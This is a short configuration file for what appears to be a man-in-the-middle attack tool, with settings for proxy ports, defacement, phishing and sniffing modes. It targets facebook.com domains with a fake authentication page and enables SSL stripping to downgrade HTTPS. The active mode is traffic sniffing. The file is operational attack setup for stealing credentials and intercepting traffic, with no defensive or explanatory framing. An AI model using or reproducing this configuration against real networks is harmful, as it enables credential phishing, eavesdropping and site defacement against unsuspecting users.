#################################################
############### Engine config ###################
proxy.server.port=4428
web.server.port=4429

#################################################
############### Attack config ###################
#mode=deface
#mode=phishing
mode=sniff

#################################################
############### Deface config #################
deface.page=amnafzar_authenticate.html

#################################################
############### Phishing config #################
#phishing.method=smart
#phishing.method=static

phishing.target.domain=^(.*\\.+)*facebook.com
#phishing.target.domain=^(.*\\.+)*
phishing.page=amnafzar_authenticate.html
#################################################
################ Sniff config ###################


#################################################
################# Log config ####################
log.level=4

#################################################
################## ? config #####################
ssl.strip=enable
#ssl.strip=disable

Strict-Transport-Security: